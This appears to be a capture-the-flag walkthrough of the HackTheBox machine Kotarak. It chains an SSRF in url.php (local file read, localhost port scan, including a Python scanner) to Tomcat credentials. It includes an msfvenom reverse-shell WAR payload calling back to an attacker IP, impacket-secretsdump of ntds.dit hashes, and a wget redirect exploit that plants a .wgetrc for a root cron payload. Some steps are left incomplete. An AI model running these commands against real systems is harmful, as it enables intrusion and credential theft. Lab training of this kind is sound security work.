HackTheBox - Kotarak

Last updated 4 years ago

Nmap scan results

I will be scanning all the ports, which might take some time.

Services Running

  • SSH (OpenSSH 7.2p2)

  • Apache Jserv (Protocol v1.3)

  • Apache Tomcat 8.5.5

  • Apache httpd 2.4.18 ((Ubuntu)), on port 60000

A default nmap scan only covers the top 1000 ports and would not have disclosed the Apache server on port 60000, which is why we scanned all ports.

We can probably get command execution by uploading a .war file through the Tomcat manager. For that to happen we need manager credentials.

Default/Common credentials tried (none of them worked)

  • admin:admin

  • admin:tomcat

  • tomcat:s3cr3t

  • admin:<blank>

Enumerating Apache server

http://kotarak.htb:60000/

Let's run a gobuster scan in the background.

gobuster dir -w /opt/SecLists/Discovery/Web-Content/raft-small-words.txt -u http://kotarak.htb:60000/ -x php,html,txt -o gobuster-60000.out

# cat gobuster-60000.out
/index.php            (Status: 200) [Size: 1169]
/info.php             (Status: 200) [Size: 92262]
/.                    (Status: 200) [Size: 1169]
/url.php              (Status: 200) [Size: 2]

Identifying SSRF Attack

url.php takes a parameter named path. We can point it at our own web server to check whether the application really fetches the URL:

http://kotarak.htb:60000/url.php?path=http://10.10.14.5

The request arrives at our web server, so the SSRF works. It cannot be turned into Remote File Inclusion (RFI), though: info.php shows allow_url_include set to Off, so the application will not include remote PHP files.

We can also try the SSRF to read local files through the file:// scheme:

http://kotarak.htb:60000/url.php?path=file:///etc/passwd

Scanning for localhost ports

Let's try to access localhost. We can fuzz for local ports using ffuf or wfuzz; the command below uses wfuzz with a ports.txt wordlist (one port number per line). --hw 0 hides responses that contain zero words, which filters out the empty replies you get when nothing is listening on the port.

wfuzz -c -w ports.txt --hw 0 -u http://kotarak.htb:60000/url.php?path=http://127.0.0.1:FUZZ/

Something interesting is running at

http://kotarak.htb:60000/url.php?path=http://127.0.0.1:888/

That service exposes a backup file holding the Tomcat manager credentials. Let's log in to the manager and get a reverse shell by uploading a war file.
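As an added example (not part of the original writeup), the same localhost port scan written in Python so the filtering logic is explicit: a proxied response with no words is treated as a closed port, which is exactly what --hw 0 does. The base URL is the one from this page; the ports.txt wordlist and the fake backend used to exercise the scan offline are constructed.

```python
import urllib.parse
import urllib.request

BASE_URL = "http://kotarak.htb:60000/url.php?path="


def ssrf_url(port, target="127.0.0.1", base=BASE_URL):
    """Build the url.php request that makes the server fetch http://target:port/."""
    inner = f"http://{target}:{port}/"
    return base + urllib.parse.quote(inner, safe="")


def http_fetch(port, timeout=5):
    """Real fetcher: ask url.php to proxy the request and return the body."""
    try:
        with urllib.request.urlopen(ssrf_url(port), timeout=timeout) as resp:
            return resp.read()
    except Exception:  # connection error or timeout: treat as closed
        return b""


def is_open(body):
    """wfuzz --hw 0 equivalent: zero words means nothing answered behind the SSRF."""
    return len(body.split()) > 0


def scan_ports(ports, fetch=http_fetch):
    """Return {port: first line of the body} for every port that produced output."""
    found = {}
    for port in ports:
        body = fetch(port)
        if is_open(body):
            lines = body.splitlines()
            first = lines[0] if lines else b""
            found[port] = first.decode("latin-1", errors="replace").strip()[:80]
    return found


def load_ports(text):
    """Parse a ports.txt style wordlist: one port per line, blanks and comments ignored."""
    ports = []
    for line in text.splitlines():
        line = line.strip()
        if line and not line.startswith("#") and line.isdigit():
            ports.append(int(line))
    return ports


# Constructed stand-in for url.php so the scan can be run offline.
FAKE_BACKEND = {
    888: b"<html><head><title>backup listing</title></head><body>...</body></html>",
    8080: b"<!DOCTYPE html><html><head><title>Apache Tomcat</title></head></html>",
}


def fake_fetch(port):
    return FAKE_BACKEND.get(port, b"")


if __name__ == "__main__":
    sample_wordlist = "# constructed ports.txt\n22\n80\n888\n8080\n"
    for port, banner in scan_ports(load_ports(sample_wordlist), fetch=fake_fetch).items():
        print(f"{port:5d}  {banner}")
```

Swap fake_fetch for the default http_fetch to run it against the box; the word-count filter is deliberately the same one wfuzz applies, so any port that returns even a one-word error page will show up and deserves a manual look.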

Creating a malicious war file using msfvenom

msfvenom -p java/shell/reverse_tcp LHOST=10.10.14.5 LPORT=9001 -f war -o shell.war

java/shell/reverse_tcp is a staged payload, so start a Metasploit multi/handler with the same payload, LHOST and LPORT before triggering it; a plain nc listener will receive the connection but never deliver the stage. Deploy shell.war through the manager and trigger the payload by browsing to /shell/.

Using impacket tool to get all the hashes

We can extract credentials offline from an ntds.dit file, as long as we also have the SYSTEM registry hive: it holds the boot key needed to decrypt the hashes stored in the database.

The Ntds.dit file is a database that stores Active Directory data, including information about user objects, groups, and group membership. It includes the password hashes for all users in the domain. ... The extraction and cracking of these passwords can be performed offline, so they will be undetectable.

Using impacket-secretsdump to get all the hashes.

impacket-secretsdump -ntds ntds.dit -system SYSTEM local

Exploiting wget's vulnerability

The root directory (/root) is readable and writable and contains a file named app.log.

The log reveals the version of wget fetching from the box: Wget/1.16. Versions before 1.18 follow an HTTP redirect to an FTP URL and save the download under the file name taken from the redirected URL, which lets a malicious server plant a .wgetrc in the client's working directory.

For this exploit we need both an FTP server and an HTTP server, run from our unprivileged shell on the box. If you host the FTP server with python, run it under authbind so that it can bind port 21; the same applies to the HTTP server if it has to listen on a port below 1024.

authbind is an open-source system utility written by Ian Jackson and distributed under the GNU General Public License. It allows a program that would normally require superuser privileges to bind a privileged network port to run as a non-privileged user (the port has to be permitted under /etc/authbind/byport/).

Create a .wgetrc file in any writable directory, the one the FTP server will be started from so that it is served from the FTP root, with the following contents.

Now run the FTP server using the following command.

authbind python -m pyftpdlib -p21 -w 

Copy exploit.py and edit it according to our needs.

Set HTTP_LISTEN_IP to all interfaces (0.0.0.0) and FTP_HOST to the target's IP, since the wget client has to reach our FTP server on that address. We also need to replace the root cron payload with our own.

Now we are good to go, so let's run the script.

Filesystem mounting and stuffs - Great video by Ippsec

Another method to escalate privileges (Kernel Exploit)

Running linux-exploit-suggester gives a list of candidate kernel exploits. The suggestions are based only on the kernel version string, and a failed kernel exploit can crash the box, so prefer the wget route above if the machine needs to stay up.
